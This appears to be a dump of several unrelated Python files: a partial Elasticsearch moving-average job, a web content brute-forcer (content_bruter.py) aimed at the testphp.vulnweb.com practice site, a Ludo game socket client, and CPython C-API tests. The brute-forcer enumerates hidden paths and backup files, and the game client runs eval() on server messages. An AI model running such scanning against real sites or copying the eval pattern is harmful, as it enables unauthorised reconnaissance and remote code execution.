# starting_time = query['query']['range']['s2']['gt']
return es.get_new_items()
print("reading")
import sys
import os
import json
from collections import deque
# Get parameters and set up elasticsearch
print("reading")
if not standalone:
fd = int(sys.argv[1])
data = json.loads(sys.stdin.readline())
else:
data = json.loads(SAMPLE_JOB_CONFIG)
print("setting up ES")
es = Elasticsearch([{'host': data['es']['host'], 'port': int(data['es']['port'])}])
state = data.get('state')
params = data['params']
entities = data['entities']
# Task parameters' values
# from params we get cid of signal/signal set and from according key in entities dictionary
# we can access data for that entity (like es index or namespace)
sig_set = entities['signalSets'][params['sigSet']]
ts = entities['signals'][params['sigSet']][params['ts_signal']]
source = entities['signals'][params['sigSet']][params['source_signal']]
window = int(params['window'])
values = [] # TODO: what is values? Add to the state
if state is not None and "values" in state:
values = state["values"]
print("creating deque")
queue = deque(values, maxlen=window)
if state is None or state.get('index') is None:
ns = sig_set['namespace']
msg = {}
msg['type'] = 'sets'
# Request new signal set creation
msg['sigSet'] = {
"cid": "moving_average",
"name": "moving average",
"namespace": ns,
"description": "moving average",
"aggs": "0"
}
signals = []
signals.append({
"cid": "mean",
"name": "mean",
"description": "mean",
"namespace": ns,
"type": "raw_double",
"indexed": False,
"settings": {}
})
msg['sigSet']['signals'] = signals
if standalone:
run_response = ivis_core.HandleRunRequest(RunRequest(
job_id="job1",
request=json.dumps(msg)
), None)
state = json.loads(run_response.response)
else:
ret = os.write(fd, (json.dumps(msg) + '\\n').encode())
print(f"written {ret} chars")
print("loading json from stdin")
print(json.dumps(msg))
state = json.loads(sys.stdin.readline())
print("checking error")
error = state.get('error')
if error:
sys.stderr.write(error + "\\n")
sys.exit(1)
last = None
if state is not None and state.get('last') is not None:
last = state['last']
query_content = {
"range": {
ts['field']: {
"gt": last
}
}
}
else:
query_content = {'match_all': {}}
query = {
'size': 10000,
'_source': [source['field'], ts['field']],
'sort': [{ts['field']: 'asc'}],
'query': query_content
}
print("scanning with query")
results = helpers.scan(es,
preserve_order=True,
query=query,
index=sig_set['index']
)
i = 0
print("composing state")
for item in results:
last = item["_source"][ts['field']]
val = item["_source"][source['field']]
if val is not None:
queue.append(val)
else:
continue
if i < (window - 1):
i += 1
else:
mean = sum(queue) / float(window)
doc = {
state['fields']['mean']: mean
}
res = es.index(index=state['index'], doc_type='_doc', body=doc)
state["last"] = last
state["values"] = list(queue)
# Request to store state
msg = {}
msg["type"] = "store"
msg["id"] = 1
msg["state"] = state
print("writing result")
if standalone:
run_response = ivis_core.HandleRunRequest(RunRequest(
job_id="job1",
request=json.dumps(msg)
), None)
print(f"Response:\\n{run_response.response}")
else:
ret = os.write(fd, (json.dumps(msg) + '\\n').encode())
os.close(fd)
'''
|
content_bruter.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import urllib
import threading
import Queue
threads = 5
target_url = "http://testphp.vulnweb.com"
wordlist_file = "/tmp/all.txt" # SVNDiggerから
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
def build_wordlist(wordlist_file):
# 単語の辞書を読み取る
fd = open(wordlist_file,"rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
def dir_bruter(extensions=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
# ファイル拡張子があるかどうかチェックする。もしなければディレクトリの
# パスとして総当たり攻撃の対象とする。
if "." not in attempt:
attempt_list.append("/%s/" % attempt)
else:
attempt_list.append("/%s" % attempt)
# 拡張子の総当たりをしたい場合
if extensions:
for extension in extensions:
attempt_list.append("/%s%s" % (attempt,extension))
# 作成したリストの最後まで繰り返す
for brute in attempt_list:
url = "%s%s" % (target_url,urllib.quote(brute))
try:
headers = {}
headers["User-Agent"] = user_agent
r = urllib2.Request(url,headers=headers)
response = urllib2.urlopen(r)
if len(response.read()):
print "[%d] => %s" % (response.code,url)
except urllib2.HTTPError,e:
if e.code != 404:
print "!!! %d => %s" % (e.code,url)
pass
word_queue = build_wordlist(wordlist_file)
extensions = [".php",".bak",".orig",".inc"]
for i in range(threads):
t = threading.Thread(target=dir_bruter,args=(extensions,))
t.start()
|
client.py | #-----------------Boilerplate Code Start-----------
import socket
from tkinter import *
from threading import Thread
import random
from PIL import ImageTk, Image
screen_width = None
screen_height = None
SERVER = None
PORT = None
IP_ADDRESS = None
playerName = None
canvas1 = None
canvas2 = None
nameEntry = None
nameWindow = None
gameWindow = None
leftBoxes = []
rightBoxes = []
finishingBox = None
playerType = None
dice = None
def leftBoard():
global gameWindow
global leftBoxes
global screen_height
xPos = 30
for box in range(0,11):
if(box == 0):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="red")
boxLabel.place(x=xPos, y=screen_height/2 - 88)
leftBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2- 100)
leftBoxes.append(boxLabel)
xPos +=75
def rightBoard():
global gameWindow
global rightBoxes
global screen_height
xPos = 988
for box in range(0,11):
if(box == 10):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="yellow")
boxLabel.place(x=xPos, y=screen_height/2-88)
rightBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2 - 100)
rightBoxes.append(boxLabel)
xPos +=75
def finishingBox():
global gameWindow
global finishingBox
global screen_width
global screen_height
finishingBox = Label(gameWindow, text="Home", font=("Chalkboard SE", 32), width=8, height=4, borderwidth=0, bg="green", fg="white")
finishingBox.place(x=screen_width/2 - 68, y=screen_height/2 -160)
def gameWindow():
global gameWindow
global canvas2
global screen_width
global screen_height
global dice
gameWindow = Tk()
gameWindow.title("Ludo Ladder")
gameWindow.attributes('-fullscreen',True)
screen_width = gameWindow.winfo_screenwidth()
screen_height = gameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas2 = Canvas( gameWindow, width = 500,height = 500)
canvas2.pack(fill = "both", expand = True)
# Display image
canvas2.create_image( 0, 0, image = bg, anchor = "nw")
# Add Text
canvas2.create_text( screen_width/2, screen_height/5, text = "Ludo Ladder", font=("Chalkboard SE",100), fill="white")
# Teacher Activity
leftBoard()
rightBoard()
finishingBox()
global playerTurn
global playerType
global playerName
if(playerType == 'player1' and playerTurn):
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
else:
rollButton.pack_forget()
# Creating Dice with value 1
dice = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 100, text = "\u2680", font=("Chalkboard SE",250), fill="white")
gameWindow.resizable(True, True)
gameWindow.mainloop()
def saveName():
global SERVER
global playerName
global nameWindow
global nameEntry
playerName = nameEntry.get()
nameEntry.delete(0, END)
nameWindow.destroy()
SERVER.send(playerName.encode())
# Boilerplate Code
gameWindow()
def askPlayerName():
global playerName
global nameEntry
global nameWindow
global canvas1
nameWindow = Tk()
nameWindow.title("Ludo Ladder")
nameWindow.attributes('-fullscreen',True)
screen_width = nameWindow.winfo_screenwidth()
screen_height = nameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas1 = Canvas( nameWindow, width = 500,height = 500)
canvas1.pack(fill = "both", expand = True)
# Display image
canvas1.create_image( 0, 0, image = bg, anchor = "nw")
canvas1.create_text( screen_width/2, screen_height/5, text = "Enter Name", font=("Chalkboard SE",100), fill="white")
nameEntry = Entry(nameWindow, width=15, justify='center', font=('Chalkboard SE', 50), bd=5, bg='white')
nameEntry.place(x = screen_width/2 - 220, y=screen_height/4 + 100)
button = Button(nameWindow, text="Save", font=("Chalkboard SE", 30),width=15, command=saveName, height=2, bg="#80deea", bd=3)
button.place(x = screen_width/2 - 130, y=screen_height/2 - 30)
nameWindow.resizable(True, True)
nameWindow.mainloop()
# Boilerplate Code
def recivedMsg():
global SERVER
global playerType
global playerTurn
global rollButton
global screen_width
global screen_height
global canvas2
global dice
global gameWindow
while True:
message = SERVER.recv(2048).decode()
if('player_type' in message):
recvMsg = eval(message)
playerType = recvMsg['player_type']
playerTurn = recvMsg['turn']
elif('⚀' in message):
# Dice with value 1
canvas2.itemconfigure(dice, text='\u2680')
elif('⚁' in message):
# Dice with value 2
canvas2.itemconfigure(dice, text='\u2681')
elif('⚂' in message):
# Dice with value 3
canvas2.itemconfigure(dice, text='\u2682')
elif('⚃' in message):
# Dice with value 4
canvas2.itemconfigure(dice, text='\u2683')
elif('⚄' in message):
# Dice with value 5
canvas2.itemconfigure(dice, text='\u2684')
elif('⚅' in message):
# Dice with value 6
canvas2.itemconfigure(dice, text='\u2685')
if('player1Turn' in message and playerType == 'player1'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
elif('player2Turn' in message and playerType == 'player2'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 260)
def setup():
global SERVER
global PORT
global IP_ADDRESS
PORT = 6000
IP_ADDRESS = '127.0.0.1'
SERVER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SERVER.connect((IP_ADDRESS, PORT))
# Boilerplate Code
thread = Thread(target=recivedMsg)
thread.start()
askPlayerName()
setup()
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import namedtuple, OrderedDict
import os
import pickle
import platform
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
def setUp(self):
here = os.path.abspath(__file__)
basepath = os.path.dirname(os.path.dirname(os.path.dirname(here)))
exename = "_testembed"
if sys.platform.startswith("win"):
ext = ("_d" if "_d" in sys.executable else "") + ".exe"
exename += ext
exepath = os.path.dirname(sys.executable)
else:
exepath = os.path.join(basepath, "Programs")
self.test_exe = exe = os.path.join(exepath, exename)
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
self.oldcwd = os.getcwd()
os.chdir(basepath)
def tearDown(self):
os.chdir(self.oldcwd)
def run_embedded_interpreter(self, *args, env=None):
"""Runs a test in the embedded interpreter"""
cmd = [self.test_exe]
cmd.extend(args)
if env is not None and sys.platform == 'win32':
# Windows requires at least the SYSTEMROOT environment variable to
# start Python.
env = env.copy()
env['SYSTEMROOT'] = os.environ['SYSTEMROOT']
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
env=env)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
return out, err
def run_repeated_init_and_subinterpreters(self):
out, err = self.run_embedded_interpreter("repeated_init_and_subinterpreters")
self.assertEqual(err, "")
# The output from _testembed looks like this:
# --- Pass 0 ---
# interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
# interp 1 <0x1d4f690>, thread state <0x1d35350>: id(modules) = 139650431165784
# interp 2 <0x1d5a690>, thread state <0x1d99ed0>: id(modules) = 139650413140368
# interp 3 <0x1d4f690>, thread state <0x1dc3340>: id(modules) = 139650412862200
# interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
# --- Pass 1 ---
# ...
interp_pat = (r"^interp (\d+) <(0x[\dA-F]+)>, "
r"thread state <(0x[\dA-F]+)>: "
r"id\(modules\) = ([\d]+)$")
Interp = namedtuple("Interp", "id interp tstate modules")
numloops = 0
current_run = []
for line in out.splitlines():
if line == "--- Pass {} ---".format(numloops):
self.assertEqual(len(current_run), 0)
if support.verbose:
print(line)
numloops += 1
continue
self.assertLess(len(current_run), 5)
match = re.match(interp_pat, line)
if match is None:
self.assertRegex(line, interp_pat)
# Parse the line from the loop. The first line is the main
# interpreter and the 3 afterward are subinterpreters.
interp = Interp(*match.groups())
if support.verbose:
print(interp)
self.assertTrue(interp.interp)
self.assertTrue(interp.tstate)
self.assertTrue(interp.modules)
current_run.append(interp)
# The last line in the loop should be the same as the first.
if len(current_run) == 5:
main = current_run[0]
self.assertEqual(interp, main)
yield current_run
current_run = []
def test_subinterps_main(self):
for run in self.run_repeated_init_and_subinterpreters():
main = run[0]
self.assertEqual(main.id, '0')
def test_subinterps_different_ids(self):
for run in self.run_repeated_init_and_subinterpreters():
main, *subs, _ = run
mainid = int(main.id)
for i, sub in enumerate(subs):
self.assertEqual(sub.id, str(mainid + i + 1))
def test_subinterps_distinct_state(self):
for run in self.run_repeated_init_and_subinterpreters():
main, *subs, _ = run
if '0x0' in main:
# XXX Fix on Windows (and other platforms): something
# is going on with the pointers in Programs/_testembed.c.
# interp.interp is 0x0 and interp.modules is the same
# between interpreters.
raise unittest.SkipTest('platform prints pointers as 0x0')
for sub in subs:
# A new subinterpreter may have the same
# PyInterpreterState pointer as a previous one if
# the earlier one has already been destroyed. So
# we compare with the main interpreter. The same
# applies to tstate.
self.assertNotEqual(sub.interp, main.interp)
self.assertNotEqual(sub.tstate, main.tstate)
self.assertNotEqual(sub.modules, main.modules)
def test_forced_io_encoding(self):
# Checks forced configuration of embedded interpreter IO streams
env = dict(os.environ, PYTHONIOENCODING="utf-8:surrogateescape")
out, err = self.run_embedded_interpreter("forced_io_encoding", env=env)
if support.verbose > 1:
print()
print(out)
print(err)
expected_stream_encoding = "utf-8"
expected_errors = "surrogateescape"
expected_output = '\n'.join([
"--- Use defaults ---",
"Expected encoding: default",
"Expected errors: default",
"stdin: {in_encoding}:{errors}",
"stdout: {out_encoding}:{errors}",
"stderr: {out_encoding}:backslashreplace",
"--- Set errors only ---",
"Expected encoding: default",
"Expected errors: ignore",
"stdin: {in_encoding}:ignore",
"stdout: {out_encoding}:ignore",
"stderr: {out_encoding}:backslashreplace",
"--- Set encoding only ---",
"Expected encoding: latin-1",
"Expected errors: default",
"stdin: latin-1:{errors}",
"stdout: latin-1:{errors}",
"stderr: latin-1:backslashreplace",
"--- Set encoding and errors ---",
"Expected encoding: latin-1",
"Expected errors: replace",
"stdin: latin-1:replace",
"stdout: latin-1:replace",
"stderr: latin-1:backslashreplace"])
expected_output = expected_output.format(
in_encoding=expected_stream_encoding,
out_encoding=expected_stream_encoding,
errors=expected_errors)
# This is useful if we ever trip over odd platform behaviour
self.maxDiff = None
self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accommodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format, keywords)
when_not_skipped = False
except SystemError as e:
s = "argument 1 (impossible<bad format char>)"
when_not_skipped = (str(e) == s)
except TypeError:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format, keywords)
when_skipped = False
except SystemError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# Test handling errors in the parse_tuple_and_keywords helper itself
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', [42])
def test_bad_use(self):
# Test handling invalid format and keywords in
# PyArg_ParseTupleAndKeywords()
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '||O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1, 2), {}, '|O|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1}, '$$O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1, 'b': 2}, '$O$O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1}, '$|O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1, 'b': 2}, '$O|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '|OO', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {}, '|$O', [''])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {}, '|OO', ['a', ''])
def test_positional_only(self):
parse = _testcapi.parse_tuple_and_keywords
parse((1, 2, 3), {}, 'OOO', ['', '', 'a'])
parse((1, 2), {'a': 3}, 'OOO', ['', '', 'a'])
